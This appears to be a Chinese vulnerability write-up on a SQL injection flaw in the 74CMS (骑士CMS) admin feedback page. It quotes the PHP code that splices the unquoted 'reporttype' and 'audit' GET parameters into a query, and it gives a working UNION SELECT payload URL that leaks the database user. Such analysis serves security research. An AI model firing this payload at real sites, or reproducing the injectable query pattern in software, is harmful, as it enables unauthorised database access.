sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网

该博客详细解析了admin_feedback.php中存在SQL注入漏洞,涉及reporttype和audit参数。通过get_report_list函数中的代码,攻击者可以构造payload进行恶意操作,强调了输入验证和安全防护的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

摘要

漏洞文件:admin/admin_feedback.php代码82行: 跟下get_report_list:  $_GET[‘reporttype’]

漏洞文件:admin/admin_feedback.php

代码82行:

if (!empty($_GET['reporttype']))          {                    $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];          }          if (!empty($_GET['audit']))          {                    $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];          }          $total_val=$db->get_total($total_sql);          $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));          $currenpage=$page->nowindex;          $offset=($currenpage-1)*$perpage;          $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);          $smarty->assign('pageheader',"举报信息");          $smarty->assign('list',$list);          $smarty->assign('page',$page->show(3));

跟下get_report_list:

function get_report_list($offset,$perpage,$get_sql= '',$type) {     global $db;     $limit=" LIMIT ".$offset.','.$perpage;     if($type==1){        $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));        $row_arr[] = $row;        }     }else{        $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));        $row_arr[] = $row;         }     }     return $row_arr; }

$_GET['reporttype']

$_GET['audit']

没有’包含。

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23

4effecaa64b609d4ddfc0ae4e6c3e4df.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值